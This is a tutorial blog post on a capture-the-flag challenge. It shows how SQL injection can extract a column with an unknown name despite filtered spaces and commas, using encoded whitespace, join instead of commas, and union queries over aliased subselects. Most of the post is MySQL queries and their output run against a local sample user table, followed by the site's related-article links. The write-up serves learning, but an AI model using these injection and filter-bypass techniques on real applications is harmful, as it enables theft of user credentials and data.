How to bypass unknown field names in MySQL

Preface

This article introduces the fifth question of DDCTF, the technique of bypassing unknown field names. Here I use the local machine to operate it. The idea is great and clear. Share it with everyone. Let's take a look at the detailed introduction:

Implementation ideas

The question filters spaces and commas. Spaces can be bypassed using %0a, %0b, %0c, %0d, %a0, or parentheses directly. Commas can be bypassed using join.

The field name storing the flag is unknown, and information_schema.columns also filters the hex of the table name, that is, the field name cannot be obtained; in this case, a joint query can be used, and the process is as follows:

The idea is to get the flag and make it appear under a known field name;

Sample code:

mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| a | b | c | d |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
 
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)
 
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user;
+---+-------+----------+-------------+
| 1 | 2 | 3 | 4 |
+---+-------+----------+-------------+
| 1 | 2 | 3 | 4 |
| 1 | admin | admin888 | [email protected] |
| 2 | test | test123 | [email protected] |
| 3 | cs | cs123 | [email protected] |
+---+-------+----------+-------------+
4 rows in set (0.01 sec)
 
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e;
+-------------+
| 4 |
+-------------+
| 4 |
| [email protected] |
| [email protected] |
| [email protected] |
+-------------+
4 rows in set (0.03 sec)
 
mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3;
 
+-------------+
| 4 |
+-------------+
| [email protected] |
+-------------+
1 row in set (0.01 sec)
 
mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d
union select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;
+-------------+----------+----------+-------------+
| id | username | password | email |
+-------------+----------+----------+-------------+
| 1 | admin | admin888 | [email protected] |
| [email protected] | 1 | 1 | 1 |
+-------------+----------+----------+-------------+
2 rows in set (0.04 sec)

Summarize

The above is the full content of this article. I hope that the content of this article can bring some help to your study or work. If you have any questions, you can leave a message to communicate. Thank you for your support of 123WORDPRESS.COM.

You may also be interested in:

Prevent xss and sql injection: JS special character filtering regular
A SQL statement to filter duplicate data
Summary of MySQL injection bypass filtering techniques
SQL injection bypasses single quote restriction and continues injection
Summary of SQL injection bypass techniques
Using multi-column composite indexes to bypass a bug in Microsoft SQL Server
Some knowledge points about SQL injection bypass
Method for recovering accidentally deleted heap table records in SQL Server simple mode (bypassing header verification)
SQL injection techniques: Detailed analysis of bypassing comma filtering in explicit and blind injections

<<: Tomcat obtains the client domain name of Nginx reverse proxy

>>: How to reduce image size using Docker multi-stage build

How to bypass unknown field names in MySQL

LayUI+Shiro implements a dynamic menu and remembers the example of menu expansion

Solve MySQL deadlock routine by updating different indexes

6 inheritance methods of JS advanced ES6

Introduction to new features of ECMAscript

Solution to Docker pull timeout

MySQL 5.7.18 master-slave replication setup (one master and one slave) tutorial detailed explanation

Vue3 draggable left and right panel split component implementation

Use vertical-align to align input and img

CSS delivery address parallelogram line style example code

Getting Started Tutorial for Beginners ④: How to bind subdirectories

Recommend

How to install openssh from source code in centos 7

In-depth analysis of MySQL indexes

How to determine if the Linux system is installed on VMware

JavaScript singleton mode to implement custom pop-up box

Example code for hiding element scrollbars using CSS

Vue axios interceptor commonly used repeated request cancellation

Detailed explanation of the top ten commonly used string functions in MySQL

MySQL data aggregation and grouping

Detailed explanation of the use of MySQL comparison operator regular expression matching REGEXP

MySQL 8.0.19 supports locking an account after entering an incorrect password three times (example)

SSH port forwarding, local port forwarding, remote port forwarding, dynamic port forwarding details

Detailed explanation of the new array methods in JavaScript es6

Linux installation apache server configuration process

Mini Program to implement Token generation and verification

MySQL essential basics: grouping function, aggregate function, grouping query detailed explanation